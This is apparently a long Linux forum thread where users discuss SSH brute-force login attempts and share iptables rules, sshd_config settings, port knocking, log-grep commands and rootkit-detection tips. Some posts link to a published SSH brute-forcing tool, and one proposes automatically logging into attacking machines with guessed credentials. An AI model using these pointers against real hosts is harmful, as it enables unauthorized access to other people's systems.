* And for some more fun, although fictional, reading you should check out the "Stealing the Network" series.  Here is a sample chapter: http://www.insecure.org/stc/

Btw, you should always have at least one layer of NAT (Network Address Translation) on your network.  This can be done with any off the shelf router or a custom built PC router.

----------

## jkt

 *mtamizi wrote:*   

> Btw, you should always have at least one layer of NAT (Network Address Translation) on your network.

 

why? it's completely useless and only causing trouble, IMHO.

----------

## mtamizi

 *Quote:*   

> why? it's completely useless and only causing trouble

 

Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.

You're right if there is only one computer on the network.  I should have stated I'm assuming there are at least two computers on the network.

----------

## krolden

 *rex123 wrote:*   

> 
> 
> To protect yourself from it, don't use your login name, or "password", or "test" etc as your password.
> 
> 

 

Or run a brute force tool against yourself.  Kinda like Randal Schwartz did.

----------

## jkt

 *mtamizi wrote:*   

>  *Quote:*   why? it's completely useless and only causing trouble 
> 
> Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.
> 
> 

 

```

iptables -P INPUT DROP

iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

```

and why to bother with NAT, if not needed?

 *Quote:*   

> 
> 
> You're right if there is only one computer on the network.  I should have stated I'm assuming there are at least two computers on the network.

 

if you have several computers and several IP addresses availabe, there's no point in doing NAT.

----------

## NightMonkey

 *jkt wrote:*   

>  *mtamizi wrote:*    *Quote:*   why? it's completely useless and only causing trouble 
> 
> Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.
> 
>  
> ...

 

Even if you have one computer, I think it's useful for the "Lazy Admin". Using NAT and Port Forwarding on a dedicated network device (with very stripped down OS and services), you have a "default deny" setup, which even works for those guests running Windows or some other OS. In other words, it takes the OS of your clients out of the equation, and uses the IP network topology (Layer 3), rather than having to explicitly deny packets from the Internet as they arrive at your hosts' interface.

While I'm not saying that the "belt and suspenders" approach of having host-based security is not valuable, this can add a layer of security that can act in addition to host-based security. For instance, we have a local root exploit in our current Linux kernels. By using a Linksys device to perform NAT and port forwarding, I don't need to care so much, since that exploit doesn't exist for the Linksys box. It's true, I need to worry about my hosts running Linux, and eagerly await a patch, I don't have to worry about my network in general, until I see an exploit of the Linksys box.

Plus, hey, I like the web-based interface for configuring port forwardings *ducks*.  :Wink: 

----------

## jkt

 *NightMonkey wrote:*   

> Even if you have one computer, I think it's useful for the "Lazy Admin". Using NAT and Port Forwarding on a dedicated network device (with very stripped down OS and services), you have a "default deny" setup, which even works for those guests running Windows or some other OS. In other words, it takes the OS of your clients out of the equation, and uses the IP network topology (Layer 3), rather than having to explicitly deny packets from the Internet as they arrive at your hosts' interface.
> 
> 

 

please, don't talk about windows, we all know that firewalling them must be done on separate box.

to the NAT - I can't see any advantages of doing that. If you have only one public IP address, you don't have any other option, of course, but if you have multiple, why not to use them?

NAT is sometimes called "firewall for poor people" - yep, that's right. If you cannot setup your router (irrelevant if it runs linux, *bsd, IOS os it is some hw box) to do proper firewalling, you can use NAT. But why?

 *Quote:*   

> While I'm not saying that the "belt and suspenders" approach of having host-based security is not valuable, this can add a layer of security that can act in addition to host-based security.

 

QUite common case is that your router is firewalling your private network. No need for NAT.

 *Quote:*   

> For instance, we have a local root exploit in our current Linux kernels. By using a Linksys device to perform NAT and port forwarding, I don't need to care so much, since that exploit doesn't exist for the Linksys box. It's true, I need to worry about my hosts running Linux, and eagerly await a patch, I don't have to worry about my network in general, until I see an exploit of the Linksys box.

 

Are you sure? You'd be quite surprised if you see how many of these boxes run linux, in fact...

And you aren't giving shell accounts on your routers/firewalls (and they don't run any services), are you? (exploit is local, not remote.)

 *Quote:*   

> Plus, hey, I like the web-based interface for configuring port forwardings *ducks*. 

 

If you insist on clicking everything, `emerge webmin`  :Smile: .

----------

## NightMonkey

Protecting your host against bad packets with iptables.... zero dollars

Seeing that the bad packets never ever get to your host in the first place.... priceless.

And, no, my linksys box isn't running Linux.

----------

## JeffW_

I just block SSH from all of China and Taiwan (http://www.404ster.com/sshblocks.php)... Brute force attacks have dropped to near nothing.  I disallow direct root access via ssh.  All users have strong passwords.  I don't have any problems.

----------

## bone

 *ill0gical wrote:*   

> I just block SSH from all of China and Taiwan (http://www.404ster.com/sshblocks.php)... Brute force attacks have dropped to near nothing.  I disallow direct root access via ssh.  All users have strong passwords.  I don't have any problems.

 

Where on earth did you get that list? Who compiled it? I just want to make sure, before i attempt to use it, that its going to only do China & Taiwan (Not brazilian hackers and russian hackers beware).

jt

----------

## JeffW_

I got the majority of the list from http://china.blackholes.us/.  I ran it through a Perl script to compact the netblocks.  I also added in netblocks which ran SSH brute force attacks against my servers.  The list is updated as new attacks occur.  I have a Perl script that can update iptables automatically (listens on a single UDP port in the upper range).

----------

## Avernus-

^^ Haha blocking China

I actually blocked the whole China IP Range (well as much as I though I safely could) at work.  Stopped alot of portscans, virus scripts, scripted hack attempts, etc.  It cut the daily size of the firewall logs in half.

Only problem is that this also blocked Austrailia and a few other countries that dont send out a mass of bad traffic.

----------

## JeffW_

Since when does Australia lease IP space from China?  Granted, their IP allocations are done through APNIC, but I'm not blocking APNIC (Japan, Hong Kong, China, Taiwan, Australia, etc...), I'm blocking China and Taiwan.

I have multiple people in Australia which use one of my servers and they've had no problems.

----------

## matador

I watched my messages log and boy did I get a hick-up there... They haven't compromized my system (since I use 16 char. passwords). I believe they might have been using this brute force utility based on the usernames: http://www.k-otik.com/exploits/08202004.brutessh2.c.php

I have already switched port but I think I will restrict the IP:s to Swedish ones.

----------

## MaxDamage

For monitoring port scans, psad just works well.

http://www.cipherdyne.com/psad/

----------

## thatguyiam

 *appleboy wrote:*   

> One thing that I would like to see created  is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information. I think if the ISPs started getting tons of email from automated programs telling them their client's are hacked they would start doing some massive overhaul and go after their clients to clean up their computers. heck, if they're systems crashed from getting so much email, I think it would make them open an eye or two  

 

... Until you mistype your own password and an e-mail is sent to your own ISP. JK

But in seriousness, brute forcing is annoying at best.  All this talk of port knocking and such--bah!  Change the port SSH runs on and don't have passwords the same as the username!  Simple.  

I've also noticed that these bots have been trying as many unique usernames as they can, like "micheal" and "nicole" and so forth.  Given that they're IP is right in the log, it wouldn't be *that* hard to trace back to them, even if they went through a few hacked boxes.  

A more interesting thing to do would be to set up a script that tried to log into the box that's probing your server with the same username they're using on yours, then send an e-mail if it's sucessful.

Or, if you're bored like me, you can play a game called "guess why that box was hacked" in which a quick nmap shows you that 4 trojans are running on it  :Very Happy: 

----------

## jkt

 *thatguyiam wrote:*   

> A more interesting thing to do would be to set up a script that tried to log into the box that's probing your server with the same username they're using on yours, then send an e-mail if it's sucessful.

 

don't do it, you will probably run into troubles as it could be illegal.

----------

## thatguyiam

jkt --

You are correct.  Although it is a bit of a grey area, legally.  In the same way that in some areas, technically, it's illegal to fight back against someone physically beating you to a pulp.  It's not advisable to try to counterhack someone, especially since they might be doing it from an (innocent) rooted box.  One application of testing to see if the test:test works on an attacking computer is that if it does, it's probably a zombie box, and an e-mail sent to root@soandsoIP could alert them to their comprimised box. But as it's been said many times, that's a lot more effort than it's worth to help someone who doesn't have the sense to not have easily guessed passwords like that.  I guess it's up to the user.

----------

## jkt

 *thatguyiam wrote:*   

> In the same way that in some areas, technically, it's illegal to fight back against someone physically beating you to a pulp.

 

OTW also here?  :Wink: 

I'm glad I don't live in such a country.

 *Quote:*   

> root@soandsoIP

 

it's useless, IMHO. if an administrator sets up such accounts, he probably doesn't read root's mail.

----------

## Enigma_Man

 *setagllib wrote:*   

> 
> 
> I very strongly recommend disabling every other kind of authentication. When you get an error authenitcating, the auth methods in parentheses should only be 'publickey'.

 

I'm a noob, but trying to learn all of this. When I try to connect with a fake name, just to test this, I get:

```
(publickey,keyboard-interactive)
```

in the parenthesis. What's keyboard-interactive? I didn't see any mention of that in the sshd_config.

Also... I have PAM enabled, and it allows me to log in with my username / password, even though I have plaintext passwords turned off. If I disable PAM, it just locks me out of the machine always. I'm trying to read the BSD info you posted, but it's a little above my head. Could you explain why at all?

Thanks,

-Jesse

----------

## jkt

 *Enigma_Man wrote:*   

> 
> 
> in the parenthesis. What's keyboard-interactive? I didn't see any mention of that in the sshd_config.

 

method of authentification in which you supply plaintext password.

 *Quote:*   

> 
> 
> Also... I have PAM enabled, and it allows me to log in with my username / password, even though I have plaintext passwords turned off.

 

look at files under /etc/pam.d/

----------

## tryze

hi all! i hope this question is ok in this thread, but i just installed root-tail and from time to time i get an odd message which doesn´t tell me anything:

(user) /usr/sbin/cron[14433]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )

does anyone know what this could be?

----------

## rex123

 *tryze wrote:*   

> [...]from time to time i get an odd message which doesn´t tell me anything:
> 
> (user) /usr/sbin/cron[14433]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
> 
> does anyone know what this could be?

 

Yes. It's a cron job which makes the cron.daily, cron.hourly etc things work. Normally it runs every minute, and if you don't filter it out it fills up your log files.

Look in /etc/crontab. Most likely it looks something like this:

```
0  *  * * * root    rm -f /var/spool/cron/lastrun/cron.hourly

1  3  * * * root    rm -f /var/spool/cron/lastrun/cron.daily

15 4  * * 6 root    rm -f /var/spool/cron/lastrun/cron.weekly

30 5  1 * * root    rm -f /var/spool/cron/lastrun/cron.monthly

*  *  * * * root    test -x /usr/sbin/run-crons && /usr/sbin/run-crons

```

/usr/sbin/run-crons is a shell script - you can read it to get an idea what it does.

If you want to filter cron stuff from your logs, try something like this (syslog-ng):

```

source src { unix-stream("/dev/log"); internal(); pipe("/proc/kmsg"); };

filter nocron { not facility (cron); };

destination messages { file("/var/log/messages"); };

log { source(src); filter(nocron); destination(messages); };

```

----------

## tryze

ah, to know what it is makes me feel much better  :Wink: 

after appearing some time in a 10 min intervall and some other messages (cron.daily and so on) i supected something like this. im not that experienced with linux/gentoo yet, so i just asked...

thanks for the help!

----------

## rex123

 *tryze wrote:*   

> [...] thanks for the help!

 

No problem

----------

## sixshot

Okay, having peeked into my log twice, I'm starting to get very, if not absolutely, annoyed at the number of attempts.  I plan on using http://www.404ster.com/sshblocks.php for starting out.  But I'm wondering what http://www.blackholes.us/ is also used for, or what purpose it serves for us.  The page doesn't seem to give out much details on what it's for other than being a listing of IP address ranges.

Also, the thing I'd like to know most is whether or not I should block specifically SSH connections from those ranges or block entirely.  I ask this because I don't know where they lead to nor do I know if I, or someone in the family, happen to browse the web and stumble upon a website that coincidentally resolves to a blocked address.  What is the best course of action?

Just in case if it's necessary, I've the latest version of Apache2 running to serve personal webpage.  No telnet.  OpenSSH is the only method to interactively login to the router box.

----------

## cbock

this post should be required reading. i've had 6400+ failed logins since last july. wow. 

i felt better after reviewing 

```
grep -i "successful" /var/log/messages

```

not to say that's a true measure of successful security.  made me feel a little better though.

----------

## dasalvagg

i've seen rootkits discussed here....here are a couple pointers in combating them

1.  External filesystem.  ps, top, ls, netstat etc. commands are often modified by a rootkit.  Use the livecd or some other external known good filesystem to run chkrootkit.  Your system will appear clean if chkrootkit depends on files that have been modified.

2.  Turn off kernel modules.  When an attacker tries to install a rootkit they will often try a kernel level attack.  What happens is they modprobe a pre built kernel module that will modify system calls to the kernel or filesystem that can hide their files.  Disabling kernel modules stops this.

3.  Prepare with hashes.  md5 your system using something like tripwire that will create a known good set of files.  If you suspect you've been hacked compare the current md5s of your system with the previously made, good, md5s.  Of course these md5s should be stored externally.  An unmounted harddrive does NOT count as external.  

4.  Dont get hacked.  Seems obvious but its the most important.  A firewall should not be your total security solution.  firewall + tripwire + nessus (to yourself) + hard passwords + ssh keys + chkrootkit regularly + checking syslogs + etc.  The more you prepare the less likely you'll ever need to post here as say "I've been hacked"

----------

## russianpirate

Does an inbound router and a firewall make it secure enough (noone can use the routers functions, but ping).. all ports are closed, no dmz, no redirections. The only way the data is going in, is if the firewall allows it (set up to allow on local in).. and if im requesting that data. My computer isnt accessible outside lan, only the router, and theres no way you can reconfigure it because there is no http configuring set, only from lan. I think you can safely skip the ssh, hard password (although i did set one thats pretty good lol), and everything else.

----------

## dasalvagg

There is a possibility still.  Security holes do occasionaly, tho not often, pop up for firewalls.  Rarely are they patched by home users that may have a linksys hardware firewall.  They just dont know how.   If you were rooted in some other way.  For instance you install a program that has a root kit in it, then u're still hacked.  A firewall will not block the person from gaining access to the rooted system.  In this case the rootkit could "call home" or create a reverse shell where it would connect to the attackers box and allow commands to be sent back to yours.  This works because the machine inside the firewall created the connection.  Security is best done in layers....apply as many as possible without denying features/ability to use the system.

----------

## rex123

Your computer is never secure. You can unplug it from the internet to improve security. You can even switch it off. But someone can break into your house, steal the hard drive, unencrypt the encrypted file system, and, finally, read your e-mail. Big deal. This is obvious Fear, Uncertainty, and Doubt.

It is important to protect against automated random attacks. It's wise to use reasonable, and reasonably usable, defensive mechanisms like firewalls. But it's daft to make your own life impossible by getting obsessed. Also, the more obsessed you are, the more of an interesting target you are for determined crackers. I would bet that security-related websites get more attacks than most others (apart from Microsoft of course).

----------

## /dev/random

 *dsegel wrote:*   

>  *braverock wrote:*   
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian 
> ...

 

Has anyone written such a script yet? If so post here.

----------

## dasalvagg

Not exactly what you're asking about, but check out port knocking.  This techniques allows you to modify your currently running firewall based upon "knocking."  The knocking daemon watches for a particular sequence of events, or knocks on the firewall then opens up a single port to the IP address that has performed the correct sequence.  This of course is useless for public servers that have lots of anonymous users, however, it is potentially powerful was to disguise the existence of a server and provide more protection for critical services(ie. sshd into your webserver)

----------

## /dev/random

Well I did read all 10 pages before posting so I've seen this mentioned before but this machine is my desktop and an http/ftp server so I don't want to trade off too much usability just for some security. So I was hoping I could figure out a way to sort of halt these hacking attempts without limiting everything else.

----------

## astrodelgato

I believe 

```
/etc/login.defs
```

 contains options to set the time between password attempts, max login attempts, etc.

I'm pretty sure that was asked about several times in this thread.

Someone please correct me if I am mistaken. 

Also, does this file affect SSH?

----------

## sinisterdomestik

 *cbock wrote:*   

> this post should be required reading. i've had 6400+ failed logins since last july. wow. 
> 
> i felt better after reviewing 
> 
> ```
> ...

 

and then i look at [code]grep -i "failed" /var/log/messages[/code and holy shit is there a lot of failed sshd attempts as root on all the ports above 60000. of course that was in september, and i dont remember what i was doing in september so it mighta been me. thank god for 10+ character passwords  :Smile: 

----------

## cbock

the easiest fix for me was changing my ssh port to something other than 22....

----------

## Zuti

If you must have sshd running (and on a home (desktop) box I honestly dont see the reason why you should) you could use a tool called portknocking.

check it out at http://www.portknocking.org

----------

## mathgeek

I have a box with fixed IP in my office. There are a lot of blunt ssh attempts in my logs, too. Thus, I reconfigured iptables so that the access to port 22 is only granted from certain ranges of IP addresses. Since I am the only user on this machine and since I have a strong password, this does little more than stop my logs from bursting. But it works, tough.

----------

## vert

Same here. But since I was interested in how often this occurs, I created a simple bash script that will email me at the end of the day if failed login attempts were detected during that day. It lists a summary of attempts per day (or ip). I get an email almost every day... For now my record stands at 400 attempts in one day! That was february 23, 2005. The most hits I had from one ip was 277 for 81.19.98.108.

Seeing the results, I quickly abandoned interactive logins and only use key files now. 

So yeah, it does seem there are a lot of compromised boxes out there  :Wink: 

----------

## WarMachine

Failed login attempts have completely ceased after I changed the config to listen on a much higher port number.

----------

## vert

Thought of that too, but I'm working in a lot in different places behind various firewalls, and usually only the common ports are open.

----------

## Sysa

 *Determined wrote:*   

> Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.
> 
> The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.

 

"... hardware firewall ..." -  :Laughing:  . I do not think it saves you but you'll not see and control the situation!!

----------

## Veronika

Bcore,

thanks for bringing up this topic. I´m kind of what you have been until this happened to you: a trusting user and installer, not too much worried about hacking attemps aimed at my system... so thank you again for sharing your story. It makes me think I have to be more careful.

Best

 :Razz: 

----------

## simulacrum

You can count me in as a lazy admin with an old version of Awstats (6.2). The cracker was able to load multiple apps, the purpose of which I'm unsure, although one appears to be some kind of IRC bot. The really strange part was my server was fine for the two days since it was compromised. I was SSH'ed in this morning fiddling around as usual for me and I saw the offending process. When I killed it everything went south. Once I booted the LiveCD and looked at the filesystem I found that all the executables in /bin had been overwritten at about the time when I killed that process. It would seem that it was some kind of local root exploit waiting to go off.

I know I'm not the only one who's been rooted because of awstats, but I need to vent. I'm pretty bummed. I'm recompiling now and will soon have a fresh Gentoo install. Ironically, the intrusion happened the day after posting my screenshot in off the wall. I wonder if the script kiddies were looking for vulnerable machines on the Gentoo forums. Beware.

----------

## MrUlterior

Do you have a .tar of the rootkit or at least the names of the files the intruder uploaded? I'd be very interested having a squiff at that one.

----------

## Giorgio

me too...

thanks

----------

## Maedhros

Merged the previous three posts here.

----------

## djdunn

my openbsd gets beat on, on a daily basis for this kind of stuff.  for being an old machine.  It shrugs the repeated attacks off fine.  I don't worry about it.  closing my firewall off completly to incomming ports and packets helps.  It's part of the times we live in.  It's better to adjust and accept that people will try than to make it so that you don't notice they are there.  I reinstall every 6 months to keep OpenBSD up to date.  So log files arent a big problem.  I'd rather them know that im here and they cant mess with me than to be invisible.

----------

## simulacrum

The intruder grabbed vulturu.tar.gz and upacked an application called "raven" There were several other applications downloaded but I didn't bother saving them. I guess in retrospect that might have been the way to go. I'd be curious if anyone here was familiar with this vulturu/raven application.

----------

## killfire

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

my suggestion is get another box, as powerful as possible, and install openbsd on it, then set it up as a firewall.... 

if you can just drop all connections on port 22 except the ones you want (white list it kind of)

or if not, just shut down port 22 for a certain ip after 2 or 3 attempts.... that way, your firewall takes a beating, but who cares, openbsd is like a rock... and your actual computer is free of all but a few connections...

killfire

----------

## killfire

 */dev/random wrote:*   

> Well I did read all 10 pages before posting so I've seen this mentioned before but this machine is my desktop and an http/ftp server so I don't want to trade off too much usability just for some security. So I was hoping I could figure out a way to sort of halt these hacking attempts without limiting everything else.

 

if you dont even need ssh, then its simple:

get a dedicated firewall (openbsd is best, but most things will do), a cheap old box will do

and deny everything  except port 80 and port 21... (my memories terrible, 21 is ftp right?)

otherwise look into dynamically updating pf's rukes, with something like snortsam...

killfire

----------

## rex123

I've just seen this excellent site: http://www.ranum.com/security/computer_security/papers/a1-firewall/

----------

## mekong

One question: Is there a worm active on sshd port? I've got logins attemps a few hunderds time daily from dozen IP's. Are these all hacked linuxboxes?

 :Crying or Very sad: 

----------

## Pacolov

 *Quote:*   

> 
> 
> Mar 23 15:11:50 [sshd] Did not receive identification string from 217.74.167.142
> 
> Mar 23 15:18:38 [sshd] Illegal user test from 217.74.167.142
> ...

 

Damn, I didn't even notice that stuff like this is going on at my server. luckily i keep it up to date and have secure logins only and use ssl where i can.

another spot: these fu**** steal bandwidth :o(

----------

## sam22

Following is a sample from my log.

This freak is trying with serveral login names. First common male, then female then  colors black, red,...

Fortunately none of the times he got access.

Mar 24 22:10:41 vlinsrv sshd[10528]: Illegal user jordan from 82.149.224.51

Mar 24 22:10:41 vlinsrv sshd(pam_unix)[10528]: check pass; user unknown

Mar 24 22:10:41 vlinsrv sshd(pam_unix)[10528]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de

Mar 24 22:10:43 vlinsrv sshd[10528]: Failed password for illegal user jordan from 82.149.224.51 port 59084 ssh2

Mar 24 22:10:44 vlinsrv sshd[10530]: Illegal user michael from 82.149.224.51

Mar 24 22:10:45 vlinsrv sshd(pam_unix)[10530]: check pass; user unknown

Mar 24 22:10:45 vlinsrv sshd(pam_unix)[10530]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de

Mar 24 22:10:47 vlinsrv sshd[10530]: Failed password for illegal user michael from 82.149.224.51 port 59230 ssh2

Mar 24 22:10:48 vlinsrv sshd[10532]: Illegal user nicole from 82.149.224.51

Mar 24 22:10:49 vlinsrv sshd(pam_unix)[10532]: check pass; user unknown

Mar 24 22:10:49 vlinsrv sshd(pam_unix)[10532]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de

Mar 24 22:10:51 vlinsrv sshd[10532]: Failed password for illegal user nicole from 82.149.224.51 port 59371 ssh2

Mar 24 22:10:52 vlinsrv sshd[10534]: Illegal user daniel from 82.149.224.51

Mar 24 22:10:57 vlinsrv sshd(pam_unix)[10534]: check pass; user unknown

Mar 24 22:10:57 vlinsrv sshd(pam_unix)[10534]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de

Mar 24 22:11:00 vlinsrv sshd[10534]: Failed password for illegal user daniel from 82.149.224.51 port 59513 ssh2

----------

## 59729

ssh displays the ip or the domain from the person trying to login right?

```

## drop all from xxx

iptables -A INPUT --source xxx.xxx.xxx.xxx -j DROP

### drop all from xxx on dport 22

#iptables -A INPUT --source xxx.xxx.xxx.xxx --dport 22 -j DROP

```

----------

## moocha

 *simulacrum wrote:*   

> The intruder grabbed vulturu.tar.gz and upacked an application called "raven" There were several other applications downloaded but I didn't bother saving them. I guess in retrospect that might have been the way to go. I'd be curious if anyone here was familiar with this vulturu/raven application.

 

Bit of trivia: In Romanian, "vultur" means "eagle". Sounds like a nickname / handle for the creator of the corresponding rootkit. Not surprising, too - Romania does seem to exhibit an unusually high density of script kiddies per square kilometer.

----------

## Mythos

sorry but ... why use 22 port ? change port ...

Block as default your iptables and only allow what you want ...

install hardened-dev-sources with gprsec and pAX plus selinux, then your system is close to openbsd and heaven secure i guess.

something like this ...

```
#Accept NEW,ESTABLISHED,RELATED

ACCEPTNER='-m state --state NEW,ESTABLISHED,RELATED -j ACCEPT'

ACCEPTER='-m state --state ESTABLISHED,RELATED -j ACCEPT'

ACCEPTN='-m state --state NEW -j ACCEPT'

AC='-m state --state NEW,ESTABLISHED,RELATED' 

# Only chosen port's will be accept.

$IPTABLES -P INPUT DROP

$IPTABLES -P OUTPUT DROP

$IPTABLES -P FORWARD DROP 

$IPTABLES -A INPUT -p tcp $ACCEPTER

$IPTABLES -A INPUT -p tcp -s $EXTIP -d $locaIP --dport 1022 $ACCEPTN #SSHD 

#Block all

$IPTABLES -A INPUT -p tcp -j DROP 
```

i have this in my sshd_config

```
#/etc/ssh/sshd_config

Port 1022

Protocol 2

AllowUsers dune

LoginGraceTime 1m

PermitRootLogin no

StrictModes yes

MaxAuthTries 2

PasswordAuthentication no

PermitEmptyPasswords no

UsePAM yes

Subsystem       sftp    /usr/lib/misc/sftp-server
```

----------

## alxcm

Hey all...

Do you think a firewall is really necessary?  I run a DMZ'd server with the following nmap -sS reply:

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-03-28 12:22 EST

Interesting ports on xxx (x.x.x.x):

(The 1655 ports scanned but not shown below are in state: closed)

PORT     STATE SERVICE

80/tcp   open  http

111/tcp  open  rpcbind

631/tcp  open  ipp

1024/tcp open  kdm

1025/tcp open  NFS-or-IIS

2049/tcp open  nfs

3632/tcp open  distccd

8080/tcp open  http-proxy

Nmap run completed -- 1 IP address (1 host up) scanned in 188.675 seconds

I get people bouncing off of ssh all the time but my passwords are very secure...nobody has yet logged in, as far as I can tell from the logs.  I know distcc might not be the best idea, but I'll probably set up iptables for that.  Anyway, any insecurities you can see right off the bat?

----------

## moocha

 *alxcm wrote:*   

> Anyway, any insecurities you can see right off the bat?

 There's a difference between "insecure" and "exploitable". Assuming you're running the latest packages, there are no known exploitable vulnerabilities there. But there are two basic vulnerabilities:It's possible to launch denial of service attacks against the services running on open ports, even if access control prevents unauthorized users using your services (for example, flooding the HTTP proxy with requests)Nobody can guarantee the non-existence of any exploitable vulnerabilities on those services. Historically, for example, the portmapper (port 111) has been an entry portal for a lot of nasty things (anyone remember rpcstatd?  :Very Happy: ).

----------

## Mythos

 *moocha wrote:*   

>  *alxcm wrote:*   Anyway, any insecurities you can see right off the bat? There's a difference between "insecure" and "exploitable". Assuming you're running the latest packages, there are no known exploitable vulnerabilities there. But there are two basic vulnerabilities:It's possible to launch denial of service attacks against the services running on open ports, even if access control prevents unauthorized users using your services (for example, flooding the HTTP proxy with requests)Nobody can guarantee the non-existence of any exploitable vulnerabilities on those services. Historically, for example, the portmapper (port 111) has been an entry portal for a lot of nasty things (anyone remember rpcstatd? ).

 

I think that hardened-dev-sources, have an option that prevent's that http request attack ...

```
[*] Deter exploit bruteforcing 

 CONFIG_GRKERNSEC_BRUTE:                                                 │

  │                                                                         │

  │ If you say Y here, attempts to bruteforce exploits against forking      │

  │ daemons such as apache or sshd will be deterred.  When a child of a     │

  │ forking daemon is killed by PaX or crashes due to an illegal            │

  │ instruction, the parent process will be delayed 30 seconds upon every   │

  │ subsequent fork until the administrator is able to assess the           │

  │ situation and restart the daemon.  It is recommended that you also      │

  │ enable signal logging in the auditing section so that logs are          │

  │ generated when a process performs an illegal instruction.               │

  │                                                                         │

  │ Symbol: GRKERNSEC_BRUTE [=y]                                            │

  │ Prompt: Deter exploit bruteforcing                                      │

  │   Defined at grsecurity/Kconfig:248                                     │

  │   Depends on: GRKERNSEC                                                 │

  │   Location:     
```

----------

## moocha

No, Mythos, that's a completely different thing. CONFIG_GRKERNSEC_BRUTE does not protect you against a large number of requests, it just prevents forkbombing as a side effect of a large number of request, should those requests cause the daemon to die. Even then you're still potentially vulnerable to resource starvation attacks.

----------

## Mythos

well there are no perfect system ... the best solution is patching, updating and choose carefully what services users and port's are needed...

----------

## moocha

 *Mythos wrote:*   

> well there are no perfect system ... the best solution is patching, updating and choose carefully what services users and port's are needed...

 That's very good advice. In order to have a stable and secure system, less is always more  :Smile: .

----------

## someguy

indeed

----------

## Legoguy

Beware. The list of names they try is getting longer:

http://turbogfx.homelinux.org/sshattempts.txt

That was logged on the 25th, 6 days ago. 587 attempts within 10 minutes. Of course none of them were harmful (none of them existed) but I'd imagine the list is getting longer as the thing breaks into more boxes.

Starting from October 29th 2004, there have been 4166 attempts on my machine... none of them doing anything. You only really need to worry if you have a user/pass the same, although I can't confirm that, but it seems to be the case. 

To find all of the relevant items in your log:

```
grep "sshd\[[0-9]\+\]: \(Invalid\|User\|reverse\)" /var/log/messages
```

Add a " | wc -l " on it to see the number of attempts.

----------

## 59729

 *Legoguy wrote:*   

> Beware. The list of names they try is getting longer:
> 
> http://turbogfx.homelinux.org/sshattempts.txt
> 
> That was logged on the 25th, 6 days ago. 587 attempts within 10 minutes. Of course none of them were harmful (none of them existed) but I'd imagine the list is getting longer as the thing breaks into more boxes.
> ...

 

Actually

```
grep -c "sshd\[[0-9]\+\]: \(Invalid\|User\|reverse\)" /var/log/messages
```

does the trick, no need to pipe

----------

## Randseed

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. 

 

If you can, set up OpenVPN as a server on your home machine, and then OpenVPN as a client on the work box. Then only allow incoming connections on the OpenVPN server. Then to even see ssh, they have to somehow crack OpenVPN first, THEN ssh in.

----------

## tdi

use knocked. 

they first have to know the order of knocks ...

or hardcore sci-fi version: 

use OpenVPN with ssh in it over the ppp in ICMP (ppp over icmp is possible)

----------

## moocha

Or, easier: Don't use passwords. Use public key authentication and passphrases.

----------

## rdvrey

Why not use sshd (or webmin) for remote control, but ...

make sshd use another port something weird and odd say 41567

and use portsentry to setup traps and 41560-41566 and 41568-41575

This way it is not a standard port and will only be found if a full port scan is done (costs a lot of time to scan).

But any scan from 0-65000 or the other way round, will fall in the portsentry trap before reaching anything serious

Portsentry then puts the IP address in the deny list of the firewall which totaly blocks that IP for any form of connection.

Works for me for many years now.

Robert

PS don't make a typo when connecting yourself, you will get banned yourself (i haved that to)

----------

## moocha

Or, easier: Don't use passwords. Use public key authentication and passphrases.

 :Smile: 

----------

## rdvrey

[quote="moocha"]Or, easier: [b]Don't use passwords. Use public key authentication and passphrases.[/b]

:)[/quote]

But then you will need to have your key anywhere you go, I don't

----------

## pinger

3650 attempts since last May. All of them unsuccesful as far as I can tell. I have a nice collection of emails from ISPs saying they sent official warning letters or even kicked their users. Methinks a couple of script kiddies out there had some explaining to do to Daddy  :Laughing: 

----------

## mallchin

grep: /var/log/messages: No such file or directory   :Rolling Eyes: 

----------

## amne

Split off Unknown MAC in WLAN

----------

## nshade

I am not sure if you ever figured out what was done on your system but I can tell you after seeing a lot of this from working for a server farm that offers servers for what ever you want like hosting and stuff.

I see it every day. What happend to you was a brute force ssh scan that they found an account with an insecure password as you have stated the user account test with the password test. This happens daily where I work because people are umm how shall I say this.. dumb in creating an account with the same password. 

Well those files you found are for launching an attack on another server or computer.. AKA packet kiddies do this to take someone off line or take a site off line when multiple servers/workstations are compromised this way they use them to launch a DDOS attack.. 

It kinda sucks yes but that is why you should always stress on security and securing your server/workstation and making dang sure that your passwords are secure as well no username and password should be the same. 

